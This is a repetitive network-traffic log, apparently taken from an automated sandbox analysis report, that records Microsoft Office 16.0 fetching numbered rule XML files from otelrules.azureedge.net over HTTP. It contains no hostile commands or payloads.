                          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
